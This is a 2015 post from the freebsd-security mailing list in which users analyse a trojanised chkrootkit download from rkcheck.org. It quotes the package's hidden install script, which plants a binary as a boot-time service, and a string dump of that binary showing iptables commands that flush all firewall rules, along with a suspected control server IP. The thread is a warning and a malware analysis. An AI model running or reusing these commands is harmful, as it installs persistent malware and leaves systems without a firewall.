has my 10.1-RELEASE system been compromised
Ian Smith
smithi at nimnet.asn.au
Thu Feb 26 15:40:10 UTC 2015
On Wed, 25 Feb 2015 20:55:43 +0000, Christopher Schulte wrote:
> > On Feb 25, 2015, at 2:34 PM, Philip Jocks <pjlists at netzkommune.com> wrote:
> >
> > it felt pretty scammy to me, googling for the "worm" got me to
> rkcheck.org which was registered a few days ago and looks like a
> tampered version of chkrootkit. I hope, nobody installed it anywhere,
> it seems to execute rkcheck/tests/.unit/test.sh which contains
> >
> > #!/bin/bash
> >
> > cp tests/.unit/test /usr/bin/rrsyncn
> > chmod +x /usr/bin/rrsyncn
> > rm -fr /etc/rc2.d/S98rsyncn
> > ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn
> > /usr/bin/rrsyncn
> > exit
> >
> > That doesn't look like something you'd want on your boxÿÿ
>
> I filed a report with Google about that domain (Google Safe
> Browsing), briefly describing whatÿÿs been recounted here on this
> thread. It seems quite suspicious, agreed.
>
> Has anyone started an analysis of the rrsyncn binary? The last few
> lines of a simple string dump are interestingÿÿ take note what looks
> to be an IP address of 95.215.44.195.
>
> /bin/sh
> iptables -X 2> /dev/null
> iptables -F 2> /dev/null
> iptables -t nat -F 2> /dev/null
> iptables -t nat -X 2> /dev/null
> iptables -t mangle -F 2> /dev/null
> iptables -t mangle -X 2> /dev/null
> iptables -P INPUT ACCEPT 2> /dev/null
> iptables -P FORWARD ACCEPT 2> /dev/null
> iptables -P OUTPUT ACCEPT 2> /dev/null
> udevd
> 95.215.44.195
> ;*3$"
>
> > Cheers,
> >
> > Philip
>
> Chris
Seeing as noone's mentioned it yet .. if your (linux) box were running
iptables - a reasonable assumption - then running those commands would
remove and flush all your rules, leaving you with a firewall that
accepted everything, as good as no firewall at all. And then .. ?
At least FreeBSD isn't the lowest hanging fruit for these monkeys ..
cheers, Ian
More information about the freebsd-security
mailing list